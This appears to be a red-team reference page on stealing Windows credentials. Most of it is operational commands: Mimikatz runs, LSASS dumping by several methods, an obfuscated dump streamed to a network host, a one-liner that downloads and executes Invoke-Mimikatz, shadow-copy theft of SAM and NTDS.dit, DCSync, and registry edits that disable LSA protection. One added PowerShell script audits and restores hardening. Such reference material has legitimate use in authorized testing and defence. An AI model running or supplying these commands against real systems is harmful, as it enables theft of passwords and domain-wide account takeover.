
Overview

Windows stores credentials in multiple locations including LSASS process memory, the SAM database, NTDS.dit (Active Directory), and the DPAPI master key store. This page covers how to extract credentials from each location during authorized assessments.
Credential theft techniques are for authorized penetration testing and red team operations only. These techniques are highly impactful and must only be used with explicit written authorization.

Mimikatz

Mimikatz is the primary tool for Windows credential extraction:
# Elevate privileges and extract everything
mimikatz "privilege::debug" "token::elevate" \
  "sekurlsa::logonpasswords" \
  "lsadump::lsa /inject" \
  "lsadump::sam" \
  "lsadump::cache" \
  "sekurlsa::ekeys" \
  "exit"

# Individual commands
privilege::debug          # Enable SeDebugPrivilege; needs an elevated (administrator) context and fails when you are not admin
token::elevate            # Impersonate the SYSTEM token (needed for lsadump::sam, lsadump::cache and lsadump::secrets)
sekurlsa::logonpasswords  # Parse LSASS memory: NTLM hashes, Kerberos keys, and plaintext only where WDigest caching is on
lsadump::lsa /inject      # Inject into LSASS and pull account hashes through the SAM service (on a DC: every domain account)
lsadump::sam              # Local account hashes from the SAM hive (needs SYSTEM)
lsadump::cache            # Cached domain logons (MSCache v2 / DCC2): crackable, not usable for pass-the-hash
sekurlsa::ekeys           # Kerberos AES/RC4 keys per logon session, usable for overpass-the-hash

PowerShell Invoke-Mimikatz

Invoke-Mimikatz reflectively loads an embedded mimikatz build, so nothing is written to disk. The clymb3r copy below is several years old and its embedded build will not parse LSASS on current Windows releases; rebuild the script from a recent mimikatz release before relying on it, and note that the one-liner pulls the script from the internet:
IEX (New-Object System.Net.Webclient).DownloadString(
  'https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds

LSASS Dumping Methods

Procdump (Microsoft Signed)

Procdump from Sysinternals is a legitimate Microsoft-signed binary, so the executable itself is trusted. What gets caught is the behaviour and the result: opening lsass.exe with read access is watched by EDR, Defender's ASR rule "Block credential stealing from the Windows local security authority subsystem" blocks the dump outright, and a finished LSASS dump on disk is detected by signature. Expect this to work on hosts without ASR or EDR, not on a hardened estate:
# Local dump
C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp

# Remote (from live.sysinternals.com; the WebDAV mapping needs the WebClient service running)
net use Z: https://live.sysinternals.com
Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
Then extract credentials:
# Load and parse with Mimikatz
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords

comsvcs.dll (No Upload Required)

# Get the LSASS PID (run from an elevated shell: MiniDump needs SeDebugPrivilege)
$lsassPid = (Get-Process -Name lsass).Id

# Dump using the built-in DLL; use an absolute output path, rundll32 resolves it relative to its own directory otherwise
rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump $lsassPid C:\Windows\Temp\lsass.dmp full

Task Manager (GUI Method)

  1. Right-click Task Bar → Task Manager → More Details
  2. Find “Local Security Authority Process” in Processes tab
  3. Right-click → “Create dump file”
  4. The dialog shows the output path; Task Manager writes the dump to %LOCALAPPDATA%\Temp\lsass.DMP

PPLBlade (Bypasses Protected Process Light)

PPLBlade dumps LSASS while:
  • Bypassing PPL protection
  • Obfuscating the dump file to evade Defender signatures
  • Supporting fileless (in-memory) upload via RAW or SMB
PPLBlade.exe --mode dump --name lsass.exe --handle procexp \
  --obfuscate --dumpmode network --network raw --ip 192.168.1.17 --port 1234

LalsDumper (SSP-Based — No MiniDumpWriteDump)

Advanced three-stage dumper that loads a malicious SSP into LSASS, never calling MiniDumpWriteDump:
  1. Stage 1 (lals.exe) — patches fdp.dll placeholder with path to rtu.txt, saves as nfdp.dll, calls AddSecurityPackageA("nfdp","fdp") to force LSASS to load the rogue SSP
  2. Stage 2 (inside LSASS) — rogue DLL reads rtu.txt, XORs with 0x20, maps decoded shellcode
  3. Stage 3 — reimplements MiniDump logic via direct syscalls, streams compressed LSASS dump to %TEMP%\<pid>.ddt
# Keep all files in same directory: lals.exe, fdp.dll, rtu.txt
# Running lals.exe requires admin/SeTcb rights
# Output: %TEMP%\<pid>.ddt — decompress, then use with Mimikatz/Volatility

SAM and SYSTEM Extraction

The SAM hive stores local account hashes. The file is held open by the kernel and its registry key is ACL'd to SYSTEM, so you either run as SYSTEM, let reg save export it from an elevated shell, or copy the file out of a shadow copy or through a raw volume read. The hashes are encrypted with a key derived from the boot key in the SYSTEM hive, so always take SYSTEM along with SAM.

From Registry

reg save HKLM\sam sam
reg save HKLM\system system
reg save HKLM\security security
Extract hashes on the attacker machine (samdump2 takes the SYSTEM hive first, then SAM; adding SECURITY to secretsdump also yields LSA secrets and cached domain logons):
samdump2 system sam
impacket-secretsdump -sam sam -security security -system system LOCAL

Volume Shadow Copy

# Create shadow copy (vssadmin create shadow only exists on Windows Server; on client SKUs use the PowerShell/WMI snippet below)
vssadmin create shadow /for=C:

# Copy SAM from shadow (replace HarddiskVolumeShadowCopy8 with your copy number, shown by vssadmin list shadows)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SAM C:\Extracted\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\system32\config\SYSTEM C:\Extracted\SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy8\windows\ntds\ntds.dit C:\Extracted\ntds.dit
PowerShell alternative:
$service=(Get-Service -name VSS)
if($service.Status -ne "Running"){$notrunning=1;$service.Start()}
$id=(gwmi -list win32_shadowcopy).Create("C:\","ClientAccessible").ShadowID
$volume=(gwmi win32_shadowcopy -filter "ID='$id'")
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\sam" C:\Users\Public
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\system" C:\Users\Public
cmd /c copy "$($volume.DeviceObject)\windows\ntds\ntds.dit" C:\Users\Public
$volume.Delete();if($notrunning -eq 1){$service.Stop()}

NTDS.dit — Active Directory Database

The NTDS.dit file is the AD database (an ESE/JET database) holding every domain account's password hashes. Each stored hash is wrapped in three layers, which is why a copy of ntds.dit is useless without the matching SYSTEM hive (source of the boot key):
  1. Decrypt the PEK (Password Encryption Key): RC4 keyed with MD5(boot key || PEK salt repeated 1000 times), boot key taken from the SYSTEM hive
  2. Decrypt the hash record: RC4 keyed with MD5(PEK || the record's own 16-byte salt)
  3. Remove the DES layer: two DES-ECB blocks whose keys are derived from the account's RID (the same scheme the SAM uses)
Domain controllers from Windows Server 2016 onward use AES instead of RC4 in the first two layers; the RID-keyed DES layer is unchanged.

Copy NTDS.dit

# Using ntdsutil (Windows Server 2008+): the IFM set contains Active Directory\ntds.dit plus registry\SYSTEM and SECURITY, so the boot key travels with the database
ntdsutil "ac i ntds" "ifm" "create full c:\copy-ntds" quit quit

Extract Hashes

# Impacket secretsdump (remote): pulls hashes over DRSUAPI replication (DCSync), so the account needs "Replicating Directory Changes (All)"; Domain Admins have it
secretsdump.py -just-dc-ntlm <DOMAIN>/<DA_USER>@<DOMAIN_CONTROLLER>

# Local extraction from a copied ntds.dit plus the matching SYSTEM hive (writes credentials.ntds and friends)
secretsdump.py -ntds ntds.dit -system SYSTEM -outputfile credentials LOCAL

# For large NTDS.dit files (Go reimplementation, much faster than the Python parser)
gosecretsdump -ntds ntds.dit -system SYSTEM

Export NTDS to SQLite

ntdsdotsqlite ntds.dit -o ntds.sqlite --system SYSTEM.hive
# Extracts: user/machine accounts, hashes, UAC flags, group membership, OUs, trust info

CrackMapExec Credential Dumping

# Dump SAM hashes (CrackMapExec is archived; NetExec, invoked as nxc, is the maintained fork and takes the same flags)
cme smb 192.168.1.0/24 -u UserName -p 'PASSWORD' --sam

# Dump LSA secrets
cme smb 192.168.1.0/24 -u UserName -p 'PASSWORD' --lsa

# Dump NTDS.dit from DC
cme smb 192.168.1.100 -u UserName -p 'PASSWORD' --ntds

DPAPI — Decrypting Stored Credentials

DPAPI protects Credential Manager blobs, browser passwords, and PowerShell credentials. Every blob names the master key that protects it, and that master key is itself encrypted with the user's password (or recoverable with the domain DPAPI backup key), so decryption is a chain: backup key or password → master key → blob:
# Locate the user's DPAPI master keys (one directory per SID; the files are hidden and named by GUID)
Get-ChildItem -Force C:\Users\USER\AppData\Roaming\Microsoft\Protect\
# Machine (SYSTEM) master keys
Get-ChildItem -Force C:\Windows\System32\Microsoft\Protect\S-1-5-18\

# Locate DPAPI-protected Credential Manager files (hidden, so list with /a)
dir /a C:\Users\username\AppData\Local\Microsoft\Credentials\
dir /a C:\Users\username\AppData\Roaming\Microsoft\Credentials\

# Mimikatz DPAPI decryption: master key first (here with the domain backup key; /sid and /password work when you know the user's password), then the blob
dpapi::masterkey /pvk:backupkey.pvk /in:MasterKeyFile
dpapi::cred /masterkey:<key> /in:CredentialFile

# Extract master keys already cached in LSASS memory (requires privilege::debug / SYSTEM)
sekurlsa::dpapi

Mining Idle RDP Sessions

After compromise, look at who has RDP'd into or out of this host. A disconnected-but-not-logged-off RDP session keeps that user's logon session, and therefore its secrets, in LSASS (sekurlsa::logonpasswords lists them), and the client-side server MRU tells you where that user's credentials are valid elsewhere. Only hives of logged-on users are loaded under HKEY_USERS, so the outbound query covers current sessions:
# Find outbound RDP targets from all loaded user hives (HKU: is not a default drive, so map it first)
New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS -ErrorAction SilentlyContinue | Out-Null
Get-ChildItem HKU:\ | Where-Object { $_.PSChildName -match '^S-1-5-21-[\d-]+$' } | ForEach-Object {
    $sid = $_.PSChildName
    Get-ChildItem "HKU:\$sid\SOFTWARE\Microsoft\Terminal Server Client\Servers" -ErrorAction SilentlyContinue |
      ForEach-Object {
          # UsernameHint is the account last used against that host
          $server = $_.PSChildName
          $user   = (Get-ItemProperty -Path $_.PSPath).UsernameHint
          "OUT:$($sid):$($server):$($user)"
      }
}

# Find inbound RDP evidence (Event IDs 21 = logon, 24 = disconnect, 25 = reconnect; Properties: 0 = User, 1 = SessionID, 2 = Address)
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-TerminalServices-LocalSessionManager/Operational'; Id = 21,24,25 } -ErrorAction SilentlyContinue |
  Select-Object TimeCreated, Id,
    @{ n = 'User'; e = { $_.Properties[0].Value } },
    @{ n = 'IP';   e = { $_.Properties[2].Value } }

Registry Downgrades for Credential Theft

FinalDraft-style implants set registry values so that later credential theft and lateral movement work; the reg add lines below put the host into the weakened state (the defaults are RunAsPPL as configured by the admin, LocalAccountTokenFilterPolicy absent or 0, and DisableRestrictedAdmin absent):
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v DisableRestrictedAdmin /t REG_DWORD /d 1 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /t REG_DWORD /d 0 /f
  • DisableRestrictedAdmin=1 — turns Restricted Admin mode off, so every inbound RDP logon delivers the user's full credentials to this host, where they sit in LSASS for sekurlsa::logonpasswords. Pass-the-hash over RDP needs the opposite value: with 0, Restricted Admin accepts an NT-hash logon (sekurlsa::pth running mstsc /restrictedadmin) but keeps the credentials off the host, so pick the value by goal
  • LocalAccountTokenFilterPolicy=1 — disables UAC remote token filtering, so any local administrator (not only RID 500) gets a full admin token over SMB/WMI/WinRM
  • RunAsPPL=0 — turns off LSA protection so an ordinary MiniDump of lsass.exe works again; it takes effect only after a reboot and is ignored where LSA protection was enabled with the UEFI lock, and Credential Guard, where running, still keeps the secrets out of LSASS regardless
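
To see where a host stands before choosing a dumping method, and to have the hardened values next to the weakened ones, here is an added PowerShell audit. It is not from the page or from any implant; beyond the value semantics listed above it assumes two documented identifiers: Win32_DeviceGuard.SecurityServicesRunning containing 1 means Credential Guard is running, and 9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 is the Defender ASR rule that blocks credential stealing from lsass.exe. Restore-LsaHardening writes the hardened values; the RunAsPPL change needs a reboot.

```powershell
# Added audit script; not the page's code. Read-only unless Restore-LsaHardening is called.
$LsaKey       = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
$PolicyKey    = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$AsrLsassRule = '9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2'   # Defender ASR: block credential stealing from lsass.exe

function Get-RegValueOrNull {
    param([string]$Path, [string]$Name)
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }                  # absent value = Windows default
    return $item.$Name
}

function Get-CredentialTheftExposure {
    $runAsPpl = Get-RegValueOrNull $LsaKey    'RunAsPPL'
    $tokenPol = Get-RegValueOrNull $PolicyKey 'LocalAccountTokenFilterPolicy'
    $restrAdm = Get-RegValueOrNull $LsaKey    'DisableRestrictedAdmin'

    # Credential Guard: SecurityServicesRunning lists 1 when it is active
    $dg = Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    $credGuard = ($null -ne $dg) -and (@($dg.SecurityServicesRunning) -contains 1)

    # ASR action for the LSASS rule: 1 = block, 2 = audit, 6 = warn, 0 or absent = off
    $asrAction = $null
    try { $pref = Get-MpPreference -ErrorAction Stop } catch { $pref = $null }
    if ($pref) {
        $ids = @($pref.AttackSurfaceReductionRules_Ids)
        for ($i = 0; $i -lt $ids.Count; $i++) {            # -eq on strings is case-insensitive
            if ($ids[$i] -eq $AsrLsassRule) { $asrAction = $pref.AttackSurfaceReductionRules_Actions[$i] }
        }
    }

    [pscustomobject]@{
        RunAsPPL                      = $(if ($runAsPpl) { "$runAsPpl (LSA protection on; plain MiniDump fails)" } else { '0/absent: LSASS is unprotected' })
        CredentialGuard               = $(if ($credGuard) { 'running: LSASS holds no reusable secrets' } else { 'not running' })
        AsrLsassRule                  = $(if ($asrAction -eq 1) { 'block' } elseif ($asrAction -eq 2) { 'audit only' } elseif ($asrAction -eq 6) { 'warn' } else { 'off' })
        LocalAccountTokenFilterPolicy = $(if ($tokenPol -eq 1) { '1: every local admin gets a full remote token' } else { 'default: filtered (RID 500 only)' })
        DisableRestrictedAdmin        = $(if ($restrAdm -eq 0) { '0: Restricted Admin on; RDP pass-the-hash possible, credentials stay off host' } else { '1/absent: RDP logons leave full credentials on this host' })
    }
}

# Hardened counterpart of the three reg add lines above. RunAsPPL applies after reboot and is
# ignored where LSA protection is UEFI-locked (in which case the implant's write never took effect).
function Restore-LsaHardening {
    Set-ItemProperty -Path $LsaKey    -Name RunAsPPL -Type DWord -Value 1
    Set-ItemProperty -Path $PolicyKey -Name LocalAccountTokenFilterPolicy -Type DWord -Value 0
    # Default is "absent" (Restricted Admin off); set 0 instead if you deliberately run Restricted Admin mode
    Remove-ItemProperty -Path $LsaKey -Name DisableRestrictedAdmin -ErrorAction SilentlyContinue
}

Get-CredentialTheftExposure | Format-List
```

Read the output as a decision table for the LSASS section above: RunAsPPL on means procdump and comsvcs fail and a PPL bypass (PPLBlade) or the SSP route is needed; Credential Guard running means even a successful dump holds no NTLM hashes or Kerberos keys worth having, so go for SAM, DPAPI or cached logons instead.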

Invoke-NinjaCopy

Invoke-NinjaCopy (PowerSploit) opens the raw NTFS volume and parses the file system itself, so it copies files the OS holds open (SAM, NTDS.dit, SYSTEM hive) without VSS; the raw volume handle requires local admin:
# Copy SAM and SYSTEM hives while locked
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination "C:\temp\SAM"
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "C:\temp\SYSTEM"

# Extract from SAM offline
secretsdump.py -sam C:\temp\SAM -system C:\temp\SYSTEM LOCAL

Meterpreter Credential Harvesting

If you have a Meterpreter shell (get SYSTEM first with getsystem or a privilege-escalation module; kiwi needs it):
# Load kiwi (in-memory Mimikatz)
meterpreter> load kiwi
meterpreter> creds_all          # All credentials
meterpreter> lsa_dump_sam       # SAM hashes
meterpreter> lsa_dump_secrets   # LSA secrets

# Post modules: the first only finds privilege-escalation paths to the SYSTEM context hashdump needs; the other two collect credentials
msf> use post/multi/recon/local_exploit_suggester
msf> use post/windows/gather/credentials/credential_collector
msf> use post/windows/gather/smart_hashdump

Additional Tools

# Lazagne — extracts credentials from many applications
lazagne.exe all

# Windows Credentials Editor (unmaintained; targets older Windows builds)
wce.exe -w   # List cleartext passwords in memory (only where a provider such as WDigest kept them)

# fgdump / PwDump7 — SAM extraction
fgdump.exe
PwDump.exe -o outpwdump -x 127.0.0.1
